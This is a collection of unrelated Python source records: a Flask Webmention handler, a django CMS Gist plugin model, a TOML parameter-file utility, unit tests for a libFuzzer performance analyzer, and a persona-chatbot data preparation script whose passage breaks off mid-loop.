+{"seq_id":"527225135","text":"# -*- coding: utf-8 -*-\n\"\"\"\n:copyright: (c) 2016 by Mike Taylor\n:license: CC0 1.0 Universal, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nimport pytz\nimport ninka\nimport ronkyuu\n\nfrom flask import current_app\nfrom mf2py.parser import Parser\n\nfrom kaku.tools import kakuEvent, extractHCard\n\n\ndef processVouch(sourceURL, targetURL, vouchDomain):\n \"\"\"Determine if the vouch domain is valid.\n\n This implements a very simple method for determining if a vouch should\n be considered valid:\n 1. does the vouch domain have it's own webmention endpoint\n 2. does the vouch domain have an indieauth endpoint\n 3. does the domain exist in the list of domains i've linked to\n \"\"\"\n result = False\n vouchDomains = []\n vouchFile = os.path.join(current_app.config['SITE_CONTENT'], 'vouch_domains.txt')\n if os.isfile(vouchFile):\n with open(vouchFile, 'r') as h:\n for domain in h.readlines():\n vouchDomains.append(domain.strip().lower())\n\n # result = ronkyuu.vouch(sourceURL, targetURL, vouchDomain, vouchDomains)\n\n if vouchDomain.lower() in vouchDomains:\n result = True\n else:\n wmStatus, wmUrl = ronkyuu.discoverEndpoint(vouchDomain, test_urls=False)\n if wmUrl is not None and wmStatus == 200:\n authEndpoints = ninka.indieauth.discoverAuthEndpoints(vouchDomain)\n\n if 'authorization_endpoint' in authEndpoints:\n authURL = None\n for url in authEndpoints['authorization_endpoint']:\n authURL = url\n break\n if authURL is not None:\n result = True\n with open(vouchFile, 'a+') as h:\n h.write('\\n%s' % vouchDomain)\n return result\n\ndef mention(sourceURL, targetURL, vouchDomain=None):\n \"\"\"Process the incoming Webmention from the sourceURL.\n\n To verify that the targetURL being referenced by the sourceURL\n is a valid reference we run findMentions() at it and scan the\n resulting href list.\n\n This does the following checks:\n 1. The sourceURL exists\n 2. The sourceURL indeed does reference our targetURL\n 3. The sourceURL is a valid Vouch (if configured to check)\n 4. 
The sourceURL is active and not deleted, if deleted then remove\n it from our list of mentions for targetURL\n \"\"\"\n current_app.logger.info('handling Webmention from %s' % sourceURL)\n\n try:\n result = False\n vouched = False\n mentions = ronkyuu.findMentions(sourceURL)\n current_app.logger.info('mentions %s' % mentions)\n\n if mentions['status'] == 410:\n data = { 'targetURL': targetURL,\n 'sourceURL': sourceURL\n }\n current_app.logger.info('mention removal event from [%s] of [%s]' % (targetURL, sourceURL))\n kakuEvent('mention', 'deleted', data)\n else:\n for href in mentions['refs']:\n if href != sourceURL and href == targetURL:\n current_app.logger.info('post at %s was referenced by %s' % (targetURL, sourceURL))\n if current_app.config['VOUCH_REQUIRED']:\n if vouchDomain is None:\n vouched = False\n result = False\n else:\n vouched = processVouch(sourceURL, targetURL, vouchDomain)\n result = vouched\n else:\n vouched = False\n result = True\n\n if result:\n utcdate = datetime.datetime.utcnow()\n tzLocal = pytz.timezone('America/New_York')\n timestamp = tzLocal.localize(utcdate, is_dst=None)\n mf2Data = Parser(doc=mentions['content']).to_dict()\n hcard = extractHCard(mf2Data)\n data = { 'sourceURL': sourceURL,\n 'targetURL': targetURL,\n 'vouchDomain': vouchDomain,\n 'vouched': vouched,\n 'postDate': timestamp.strftime('%Y-%m-%dT%H:%M:%S'),\n 'hcard': hcard,\n 'mf2data': mf2Data,\n }\n current_app.logger.info('mention created for [%s] from [%s]' % (targetURL, sourceURL))\n current_app.logger.info(json.dumps(data, indent=2))\n kakuEvent('mention', 'create', data)\n\n current_app.logger.info('mention() returning %s' % result)\n except ValueError:\n current_app.logger.exception('Exception raised during webmention processing')\n result = False\n return result, vouched\n","sub_path":"kaku/mentions.py","file_name":"mentions.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"252296177","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.models import CMSPlugin\n\n\nclass GistPluginModel(CMSPlugin):\n\n gist_user = models.CharField('GitHub user',\n blank=False,\n default='',\n help_text=_('Choose the GitHub user for this Gist.'),\n max_length=32,\n )\n\n gist_id = models.CharField('Gist ID',\n blank=False,\n default='',\n help_text=_('Enter the Gist ID.'),\n max_length=32,\n )\n\n filename = models.CharField('filename',\n blank=False,\n default='',\n help_text=_('Optional. 
Enter the filename, if there are multiple files.'),\n max_length=32,\n )\n","sub_path":"djangocms_gist/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"200278432","text":"import toml\nfrom io import TextIOBase\nfrom enum import Enum\nfrom numbers import Real\nfrom typing import Union, Sequence, Dict, Any\nimport numpy as np\nfrom scipy import stats\n\n# ======================================================================================\n# Common\n# ======================================================================================\n\nParameterComponent = Dict[str, Any]\nEstimate = Real\nDistribution = Union[stats.rv_discrete, stats.rv_continuous]\nSamples = np.ndarray\n\n\nclass Type(Enum):\n POINT_ESTIMATE = \"point-estimate\"\n DISTRIBUTION = \"distribution\"\n SAMPLES = \"samples\"\n\n\ndef read_parameter(file: TextIOBase, component: str) -> ParameterComponent:\n file.seek(0)\n return toml.load(file)[component]\n\n\ndef write_parameter(file: TextIOBase, component: str, parameter: ParameterComponent):\n parameter_data = toml.load(file)\n parameter_data[component] = parameter\n file.seek(0)\n file.truncate()\n toml.dump(parameter_data, file)\n\n\ndef read_type(file: TextIOBase, component: str) -> Type:\n parameter = read_parameter(file, component)\n return Type(parameter[\"type\"])\n\n\n# ======================================================================================\n# Estimate\n# ======================================================================================\n\n\ndef read_estimate(file: TextIOBase, component: str) -> Estimate:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.POINT_ESTIMATE:\n # TODO : validate\n return parameter[\"value\"]\n else:\n raise ValueError(f\"{parameter['type']} != 'point-estimate'\")\n\n\ndef write_estimate(file: TextIOBase, component: str, estimate: Estimate):\n write_parameter(\n file, component, {\"type\": \"point-estimate\", \"value\": float(estimate)}\n )\n\n\n# ======================================================================================\n# Distribution\n# ======================================================================================\n\ndistribution_parsers = {\n \"gamma\": lambda data: stats.gamma(a=data[\"shape\"], scale=data[\"scale\"]),\n \"norm\": lambda data: stats.norm(loc=data[\"loc\"], scale=data[\"scale\"]),\n}\n\n\ndef read_distribution(file: TextIOBase, component: str) -> Distribution:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.DISTRIBUTION:\n # TODO : validate\n return distribution_parsers[parameter[\"distribution\"]](parameter)\n else:\n raise ValueError(f\"{parameter['type']} != 'distribution'\")\n\n\ndef write_distribution(file: TextIOBase, component: str, distribution: Distribution):\n shape, loc, scale = distribution.dist._parse_args(\n *distribution.args, **distribution.kwds\n )\n parameter = {\n \"type\": \"distribution\",\n \"distribution\": distribution.dist.name,\n }\n if loc:\n parameter[\"loc\"] = loc\n if shape:\n parameter[\"shape\"] = shape[0]\n if scale:\n parameter[\"scale\"] = scale\n write_parameter(\n file, component, parameter,\n )\n\n\n# ======================================================================================\n# Samples\n# ======================================================================================\n\n\ndef read_samples(file: TextIOBase, component: str) 
-> Samples:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.SAMPLES:\n return np.array(parameter[\"samples\"])\n else:\n raise ValueError(f\"{parameter['type']} != 'samples'\")\n\n\ndef write_samples(file: TextIOBase, component: str, samples: Samples):\n write_parameter(file, component, {\"type\": \"samples\", \"samples\": samples.tolist()})\n","sub_path":"data_pipeline_api/file_formats/parameter_file.py","file_name":"parameter_file.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"357792984","text":"# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for performance_analyzer.\"\"\"\n\nfrom builtins import next\n\nimport json\nimport os\nimport unittest\n\nfrom base import utils\nfrom bot.fuzzers import libfuzzer\nfrom bot.fuzzers.libFuzzer import stats as performance_stats\nfrom handlers.performance_report import performance_analyzer\nfrom system import environment\nfrom tests.test_libs import helpers as test_helpers\n\n# Use default values for stats values usually provided by CF.\nDEFAULT_STATS_PROVIDED_BY_CF = {\n 'actual_duration': 2350,\n 'expected_duration': 2350,\n 'timestamp': 1499904000.017923\n}\n\n\ndef _get_stats_from_log(log_path,\n strategies=None,\n arguments=None,\n stats_overrides=None):\n \"\"\"Calculate stats for the given log the same way as the engine does.\"\"\"\n if strategies is None:\n strategies = []\n if arguments is None:\n arguments = []\n\n log_lines = utils.read_data_from_file(log_path, eval_data=False).splitlines()\n stats = libfuzzer.parse_log_stats(log_lines)\n stats.update(\n performance_stats.parse_performance_features(log_lines, strategies,\n arguments))\n if stats_overrides:\n stats.update(stats_overrides)\n\n return stats\n\n\nclass PerformanceAnalyzerTestBase(unittest.TestCase):\n \"\"\"Performance analysis tests base class.\"\"\"\n\n def setUp(self):\n \"\"\"Prepare test data and necessary env variables.\"\"\"\n test_helpers.patch_environ(self)\n self.data_directory = os.path.join(\n os.path.dirname(__file__), 'performance_analyzer_data')\n self.libfuzzer_data_directory = os.path.join(self.data_directory,\n 'libfuzzer')\n environment.set_value('FAIL_RETRIES', 1)\n\n self.analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n\n\nclass PerformanceAnalyzerBasicAnalyzerTest(PerformanceAnalyzerTestBase):\n \"\"\"Performance analysis tests for BasicAnalyzer functions.\"\"\"\n\n def assert_basic_analyzer(self,\n basic_analyzer,\n log_filename,\n stats_overrides=None):\n \"\"\"Assert for testing a single basic analyzer.\"\"\"\n extra_stats = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n if stats_overrides:\n extra_stats.update(stats_overrides)\n\n log_file_path = os.path.join(self.libfuzzer_data_directory, 'issue_logs',\n log_filename)\n stats = _get_stats_from_log(log_file_path, stats_overrides=extra_stats)\n self.assertGreater(basic_analyzer(stats), 0.0)\n\n def 
test_basic_analyzer_for_bad_instrumentation(self):\n \"\"\"Test analyzer_bad_instrumentation BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_bad_instrumentation,\n 'bad_instrumentation_issue.txt')\n\n def test_basic_analyzer_for_coverage(self):\n \"\"\"Test analyzer_coverage BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_coverage,\n 'coverage_issue.txt')\n\n def test_basic_analyzer_for_crash(self):\n \"\"\"Test analyzer_crash BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_crash, 'crash_issue.txt')\n\n def test_basic_analyzer_for_leak(self):\n \"\"\"Test analyzer_leak BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_leak, 'leak_issue.txt')\n\n def test_basic_analyzer_for_logging(self):\n \"\"\"Test analyzer_logging BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_logging,\n 'logging_issue.txt')\n\n def test_basic_analyzer_for_oom(self):\n \"\"\"Test analyzer_oom BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_oom, 'oom_issue.txt')\n\n def test_basic_analyzer_for_slow_unit(self):\n \"\"\"Test analyzer_slow_unit BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_slow_unit,\n 'slow_unit_issue.txt')\n\n def test_basic_analyzer_for_speed(self):\n \"\"\"Test analyzer_speed BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_speed, 'speed_issue.txt')\n\n def test_basic_analyzer_for_startup_crash(self):\n \"\"\"Test analyzer_startup_crash BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_startup_crash,\n 'startup_crash_issue.txt')\n\n def test_basic_analyzer_for_timeout(self):\n \"\"\"Test analyzer_timeout BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_timeout,\n 'timeout_issue.txt')\n\n\nclass PerformanceAnalyzerTest(PerformanceAnalyzerTestBase):\n \"\"\"Performance analysis tests.\"\"\"\n\n def get_issues(self, log_filename, stats_overrides=None):\n \"\"\"Returns the issue for a particular log file.\"\"\"\n extra_stats = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n if stats_overrides:\n extra_stats.update(stats_overrides)\n\n log_file_path = os.path.join(self.libfuzzer_data_directory, 'issue_logs',\n log_filename)\n stats = _get_stats_from_log(log_file_path, stats_overrides=extra_stats)\n\n analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n performance_scores, affected_runs_percents, examples = (\n analyzer.analyze_stats([stats]))\n\n return analyzer.get_issues(performance_scores, affected_runs_percents,\n examples)\n\n def assert_log_has_issue_matching(self,\n log_filename,\n expected_issue,\n stats_overrides=None):\n \"\"\"Assert for testing log has a particular issue.\"\"\"\n detected_issues = self.get_issues(log_filename, stats_overrides)\n actual_issue = next(\n (i for i in detected_issues if i['type'] == expected_issue['type']),\n None)\n\n self.assertIsNotNone(\n actual_issue,\n '\"%s\" issue is not found in the result' % expected_issue['type'])\n self.assertEqual(actual_issue['percent'], expected_issue['percent'])\n self.assertEqual(actual_issue['score'], expected_issue['score'])\n\n def assert_log_has_no_issue_matching(self, log_filename, issue_type):\n \"\"\"Assert for testing log has no issue matching a particular type.\"\"\"\n detected_issues = self.get_issues(log_filename)\n detected_issue_types = [i['type'] for i in detected_issues]\n self.assertNotIn(issue_type, detected_issue_types)\n\n def assert_log_has_no_issues(self, log_filename, 
stats_overrides=None):\n \"\"\"Assert for testing log has no issues.\"\"\"\n expected_issue = {\n 'type': 'none',\n 'percent': 100.0,\n 'score': 0.0,\n 'examples': []\n }\n detected_issues = self.get_issues(log_filename, stats_overrides)\n self.assertEqual(detected_issues, [expected_issue])\n\n def test_bad_instrumentation(self):\n \"\"\"Test bad instrumentation issue.\"\"\"\n expected_issue = {\n 'type': 'bad_instrumentation',\n 'percent': 100.0,\n 'score': 256.0\n }\n self.assert_log_has_issue_matching('bad_instrumentation_issue.txt',\n expected_issue)\n\n def test_coverage(self):\n \"\"\"Test coverage issue.\"\"\"\n expected_issue = {'type': 'coverage', 'percent': 100.0, 'score': 1.0}\n self.assert_log_has_issue_matching('coverage_issue.txt', expected_issue)\n\n def test_crash(self):\n \"\"\"Test crash issue.\"\"\"\n expected_issue = {'type': 'crash', 'percent': 100.0, 'score': 4.0}\n self.assert_log_has_issue_matching('crash_issue.txt', expected_issue)\n\n def test_leak(self):\n \"\"\"Test leak issue.\"\"\"\n expected_issue = {'type': 'leak', 'percent': 100.0, 'score': 128.0}\n self.assert_log_has_issue_matching('leak_issue.txt', expected_issue)\n\n def test_logging(self):\n \"\"\"Test logging issue.\"\"\"\n expected_issue = {'type': 'logging', 'percent': 100.0, 'score': 0.86}\n self.assert_log_has_issue_matching('logging_issue.txt', expected_issue)\n\n def test_oom(self):\n \"\"\"Test oom issue.\"\"\"\n expected_issue = {'type': 'oom', 'percent': 100.0, 'score': 8.0}\n self.assert_log_has_issue_matching('oom_issue.txt', expected_issue)\n\n def test_slow_unit(self):\n \"\"\"Test slow unit issue.\"\"\"\n expected_issue = {'type': 'slow_unit', 'percent': 100.0, 'score': 2.4}\n self.assert_log_has_issue_matching('slow_unit_issue.txt', expected_issue)\n\n def test_speed(self):\n \"\"\"Test speed issue.\"\"\"\n expected_issue = {'type': 'speed', 'percent': 100.0, 'score': 0.99}\n self.assert_log_has_issue_matching('speed_issue.txt', expected_issue)\n\n def test_startup_crash(self):\n \"\"\"Test startup crash issue.\"\"\"\n stats_overrides = {'average_exec_per_sec': 0, 'new_units_added': 0}\n expected_issue = {'type': 'startup_crash', 'percent': 100.0, 'score': 256.0}\n self.assert_log_has_issue_matching('startup_crash_issue.txt',\n expected_issue, stats_overrides)\n\n def test_no_startup_crash(self):\n \"\"\"Test startup crash is not detected when libFuzzer exists early.\"\"\"\n self.assert_log_has_no_issue_matching('startup_crash_no_issue.txt',\n 'startup_crash')\n\n def test_timeout(self):\n \"\"\"Test 'timeout' issue.\"\"\"\n expected_issue = {'type': 'timeout', 'percent': 100.0, 'score': 64.0}\n self.assert_log_has_issue_matching('timeout_issue.txt', expected_issue)\n\n def test_no_logging_with_recommended_dictionaries(self):\n \"\"\"Test no logging issue for a log with recommended dictionaries.\"\"\"\n self.assert_log_has_no_issue_matching(\n 'logging_recommended_dictionary_no_issue.txt', 'logging')\n\n def test_no_logging_with_crash(self):\n \"\"\"Test no logging issue for a log with crash.\"\"\"\n self.assert_log_has_no_issue_matching('logging_crash_no_issue.txt',\n 'logging')\n\n def test_no_logging_with_slow_units(self):\n \"\"\"Test no logging issue for a log with slow units.\"\"\"\n self.assert_log_has_no_issue_matching('logging_slow_units_no_issue.txt',\n 'logging')\n\n def test_no_logging_with_sanitizer_frames(self):\n \"\"\"Test no logging issue for a log with sanitizer warnings.\"\"\"\n self.assert_log_has_no_issue_matching(\n 'logging_sanitizer_warnings_no_issue.txt', 
'logging')\n\n  def test_no_logging_with_oom(self):\n    \"\"\"Test no logging issue for a log with ooms in between frames.\"\"\"\n    self.assert_log_has_no_issue_matching('logging_oom_no_issue.txt', 'logging')\n\n  def test_no_logging_with_few_runs(self):\n    \"\"\"Test no logging issue for a log with few runs.\"\"\"\n    self.assert_log_has_no_issue_matching('logging_few_runs_no_issue.txt',\n                                          'logging')\n\n  def test_corpus_subset_run_speed_coverage(self):\n    \"\"\"Test corpus subset run is ignored for a log with speed and coverage\n    issue.\"\"\"\n    self.assert_log_has_no_issues('corpus_subset_no_coverage_speed_issue.txt')\n\n  def test_corpus_subset_run_crash(self):\n    \"\"\"Test corpus subset run is not ignored for a log with crash.\"\"\"\n    expected_issue = {'type': 'crash', 'percent': 100.0, 'score': 4.0}\n    self.assert_log_has_issue_matching('corpus_subset_crash_issue.txt',\n                                       expected_issue)\n\n  def test_perfect_fuzzer(self):\n    \"\"\"Test a perfect fuzzer, i.e. with no issues.\"\"\"\n    self.assert_log_has_no_issues('no_issue.txt')\n\n  def test_report_generation(self):\n    \"\"\"Test report generation for a directory.\"\"\"\n    analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n    report_logs_directory = os.path.join(self.libfuzzer_data_directory,\n                                         'report_logs')\n    stats_rows = []\n\n    # Use default values for stats values usually provided by CF.\n    stats_overrides = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n\n    for filename in sorted(os.listdir(report_logs_directory)):\n      # Use different timestamp values for each log.\n      stats_overrides['timestamp'] += 1\n\n      stats_rows.append(\n          _get_stats_from_log(\n              os.path.join(report_logs_directory, filename),\n              stats_overrides=stats_overrides))\n\n    performance_scores, affected_runs_percents, examples = (\n        analyzer.analyze_stats(stats_rows))\n\n    performance_issues = analyzer.get_issues(performance_scores,\n                                             affected_runs_percents, examples)\n    performance_report = performance_analyzer.generate_report(\n        performance_issues, 'fuzzer1', 'job1')\n\n    expected_report = utils.read_data_from_file(\n        os.path.join(self.libfuzzer_data_directory, 'expected_report.json'),\n        eval_data=False)\n\n    self.maxDiff = None  # pylint: disable=invalid-name\n    self.assertEqual(\n        json.loads(performance_report), json.loads(expected_report))\n","sub_path":"src/python/tests/appengine/handlers/performance_report/performance_analyzer_test.py","file_name":"performance_analyzer_test.py","file_ext":"py","file_size_in_byte":13314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155315381","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport os\nimport json\n\nimport pandas as pd\nimport copy\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport argparse\nfrom sklearn.utils import shuffle\n\nfrom data_conv import GetDataset\nfrom collections import Counter\n\n# Device parameter\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nSOS_token = 1\nEOS_token = 0\n\ncontext_len = 2\n\nclass Vocab:\n    def __init__(self, name):\n        self.name = name\n        self.word2index = {\"EOS\" : 0, \"BOS\" : SOS_token}\n        self.word2count = {}\n        self.index2word = {0: \"EOS\", SOS_token: \"BOS\"}\n        self.n_words = 2  # Count the two seed tokens, EOS and BOS\n\n    def addSentence(self, sentence):\n        for word in sentence.split(' '):\n            self.addWord(word)\n\n    def 
addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n\ndef normalizeString(s):\n s = unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(\"[.!?]\", '', s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n return s\n\ndef get_lines(data):\n lines = []\n persona = []\n for i in range(data.length):\n if len(data.diag_history[i]) < 1:\n continue\n cl = min(context_len, len(data.diag_history[i]))\n x1 = \" \".join(data.diag_history[i][(-1*cl):])\n y1 = data.response[i]\n temp = str(x1) + '\\t' + str(y1)\n lines.append(temp)\n pp = data.yourpersona[i]\n persona.append(pp)\n return lines, persona\n\ndef readLangs(auto_encoder=False, reverse=False):\n print(\"Reading lines...\")\n\n train_data = GetDataset('data/train_self_original_no_cands.txt')\n test_data = GetDataset('data/valid_self_original_no_cands.txt')\n\n lines_train, persona_train = get_lines(train_data)\n lines_test, persona_test = get_lines(test_data)\n \n lines = lines_train + lines_test\n persona = persona_train + persona_test\n\n pairs = [[normalizeString(s) for s in l.split('\\t')] for l in lines]\n\n personas = [[normalizeString(s) for s in p] for p in persona] \n\n vocab = Vocab('vocab')\n\n return vocab, pairs, personas\n\n\ndef readPhase(phase, auto_encoder=False, reverse=False):\n print(\"Reading lines...\")\n \n train_data = GetDataset('data/%s_self_original_no_cands.txt'%(phase))\n\n lines, persona = get_lines(train_data)\n \n # Split every line into pairs and normalize\n pairs = [[normalizeString(s) for s in l.split('\\t')] for l in lines]\n\n personas = [[normalizeString(s) for s in p] for p in persona] \n\n return pairs, personas\n\n\ndef filterPair(p, max_input_length):\n return len(p[0].split(' ')) < max_input_length and \\\n len(p[1].split(' ')) < max_input_length\n\ndef filterPairs(pairs, max_input_length):\n pairs = [pair for pair in pairs if filterPair(pair, max_input_length)]\n return pairs\n\ndef prepareData(phase, max_input_length, auto_encoder=False, reverse=False):\n pairs, personas = readPhase(phase, auto_encoder, reverse)\n print(\"Read %s sentence pairs\" % len(pairs))\n return pairs, personas\n\ndef prepareVocab():\n vocab, pairs, personas = readLangs()\n print(\"Read %s sentence pairs\" % len(pairs))\n\n with open(\"emo_lbl.txt\", \"r\") as read_it: \n emo_data = json.load(read_it)\n\n for i in emo_data: \n vocab.addWord(emo_data[i])\n print(\"Counting words...\")\n\n for pair in pairs:\n vocab.addSentence(pair[0])\n vocab.addSentence(pair[1])\n for p in personas:\n for s in p:\n vocab.addSentence(s)\n \n print(\"Counted words:\")\n print(vocab.name, vocab.n_words)\n\n return vocab\n\n\ndef prepareVocab2():\n vocab, pairs, personas = readLangs()\n\n print(\"Read %s sentence pairs\" % len(pairs))\n\n with open(\"emo_lbl.txt\", \"r\") as read_it: \n emo_data = json.load(read_it)\n\n for i in emo_data: \n vocab.addWord(emo_data[i])\n print(\"Getting top k words...\")\n\n\n vocab2 = prepareVocab()\n \n k = Counter(vocab2.word2count) \n\n high = k.most_common(120)\n\n for i in high:\n vocab.addWord(i[0])\n \n print(\"Counted words:\")\n print(vocab.name, vocab.n_words)\n\n return vocab\n\nclass CreateVocab():\n\n def __init__(self):\n vocab = prepareVocab2()\n self.vocab = vocab\n\n def 
voc(self):\n        return self.vocab\n\n    def __len__(self):\n        return len(self.vocab)\n\n\nclass Dataset():\n    \"\"\"dataset object\"\"\"\n\n    def __init__(self, phase, vocab, num_embeddings=None, max_input_length=None, transform=None, auto_encoder=False):\n        \"\"\"\n        The initialization of the dataset object.\n        :param phase: train/test.\n        :param num_embeddings: The embedding dimensionality.\n        :param max_input_length: The maximum enforced length of the sentences.\n        :param transform: Post processing if necessary.\n        :param auto_encoder: If we are training an autoencoder or not.\n        \"\"\"\n\n        # Skip and eliminate the sentences with a length larger than max_input_length!\n        pairs, personas = prepareData(phase, max_input_length, auto_encoder=auto_encoder, reverse=False)\n\n        if phase == \"train\":\n            pairs, personas = shuffle(pairs, personas)\n\n        print(pairs[0])\n        print(personas[0])\n\n        print((\"Total pairs and personas {} - {}\").format(len(pairs), len(personas)))\n\n        self.transform = transform\n        self.num_embeddings = num_embeddings\n        self.max_input_length = max_input_length\n        self.vocab = vocab\n        self.pairs = pairs\n        self.personas = personas \n\n    def vocab(self):\n        return self.vocab\n\n    def pairs(self):\n        return self.pairs\n\n    def __len__(self):\n        return len(self.pairs)\n\n\nMAX_INPUT_LEN = 100\n\nfrom annotate import annotate\n# Creating the vocabulary object\ncv = CreateVocab()\nvoc = cv.voc()\nvocab = voc\n\n# Create training data object\ntrainset = Dataset(phase='train', vocab=vocab, max_input_length=MAX_INPUT_LEN)\ntrain_pairs = trainset.pairs\ntrain_personas = trainset.personas\n\nmax_l = 0\n\n\n# Create testing data object\ntestset = Dataset(phase='valid', vocab=vocab, max_input_length=MAX_INPUT_LEN)\ntest_pairs = testset.pairs\ntest_personas = testset.personas\n\ntpair = test_pairs\nttpairs = copy.deepcopy(tpair)\ntper = test_personas\ntpersona = copy.deepcopy(tper)\n\n# Replacing the unknown words\ndef replace_unk(sentence):\n    ifs = []\n    for word in sentence.split(' '):\n        if word in voc.word2index:\n            ifs.append(word)\n        else:\n            ifs.append(\"UNK\")\n    return ' '.join(ifs)\n\nfor i in range(len(train_pairs)):\n    train_pairs[i][0] = replace_unk(normalizeString(train_pairs[i][0]))\n    train_pairs[i][1] = replace_unk(normalizeString(train_pairs[i][1]))\n\nfor i in range(len(test_pairs)):\n    test_pairs[i][0] = replace_unk(normalizeString(test_pairs[i][0]))\n    test_pairs[i][1] = replace_unk(normalizeString(test_pairs[i][1]))\n\nfor i in range(len(train_personas)):\n    for j in range(len(train_personas[i])):\n        train_personas[i][j] = replace_unk(normalizeString(train_personas[i][j]))\n\nfor i in range(len(test_personas)):\n    for j in range(len(test_personas[i])):\n        test_personas[i][j] = replace_unk(normalizeString(test_personas[i][j]))\n\n\nparser = argparse.ArgumentParser(description='Chatbot')\nparser.add_argument(\"--gpu_id\", type=int, default = 0, help=\"For selecting the gpu id\")\nparser.add_argument(\"--output_file\", type=str, default = \"results/Temp\", help=\"For output file names\")\nparser.add_argument(\"--message\", type=str, default = \"Temp\", help=\"For output file names\")\n\n\n# Add all arguments to parser\nargs = parser.parse_args()\n\n\nsentences = []\nfor i in range(len(train_pairs)):\n    sentences.append(train_pairs[i][0])\nemo_annotate_train_0 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(train_pairs)):\n    sentences.append(train_pairs[i][1])\nemo_annotate_train_1 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(test_pairs)):\n    
sentences.append(test_pairs[i][0])\nemo_annotate_test_0 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(test_pairs)):\n    sentences.append(test_pairs[i][1])\nemo_annotate_test_1 = annotate(sentences, args.gpu_id)\n\nfor i in range(len(train_personas)):\n    for j in range(len(train_personas[i])):\n        if len(train_personas[i][j].split(' ')) > max_l:\n            max_l = len(train_personas[i][j].split(' '))\n\nfor i in range(len(train_pairs)):\n    if len(train_pairs[i][0].split(' ')) > max_l:\n        max_l = len(train_pairs[i][0].split(' '))\n\nfor i in range(len(test_personas)):\n    for j in range(len(test_personas[i])):\n        if len(test_personas[i][j].split(' ')) > max_l:\n            max_l = len(test_personas[i][j].split(' ')) \n\nfor i in range(len(test_pairs)):\n    if len(test_pairs[i][0].split(' ')) > max_l:\n        max_l = len(test_pairs[i][0].split(' '))\n\n\nmax_l = max_l + 5\nprint(\"Max Len : \", max_l)\n\nfor i in range(len(train_pairs)):\n    if len(train_pairs[i][0].split(' ')) < max_l:\n        train_pairs[i][0] += ' EOS'\n        while len(train_pairs[i][0].split(' ')) < max_l:\n            train_pairs[i][0] += ' EOS'\n    if len(train_pairs[i][1].split(' ')) < max_l:\n        train_pairs[i][1] += ' EOS'\n        while len(train_pairs[i][1].split(' ')) < max_l:\n            train_pairs[i][1] += ' EOS'\n\nfor i in range(len(test_pairs)):\n    if len(test_pairs[i][0].split(' ')) < max_l:\n        test_pairs[i][0] += ' EOS'\n        while len(test_pairs[i][0].split(' ')) < max_l:\n            test_pairs[i][0] += ' EOS'\n    if len(test_pairs[i][1].split(' ')) < max_l:\n        test_pairs[i][1] += ' EOS'\n        while len(test_pairs[i][1].split(' ')) < max_l:\n            test_pairs[i][1] += ' EOS'\n\nfor i in range(len(train_personas)):\n    while len(train_personas[i]) < 5:\n        train_personas[i].append(\"\")\n    train_personas[i] = train_personas[i][:5]\n    for j in range(len(train_personas[i])):\n        if len(train_personas[i][j].split(' ')) < max_l:\n            train_personas[i][j] += ' EOS'\n            while len(train_personas[i][j].split(' ')) < max_l:\n                train_personas[i][j] += ' EOS'\n\nfor i in range(len(test_personas)):\n    while len(test_personas[i]) < 5:\n        test_personas[i].append(\"\")\n    test_personas[i] = test_personas[i][:5]\n    for j in 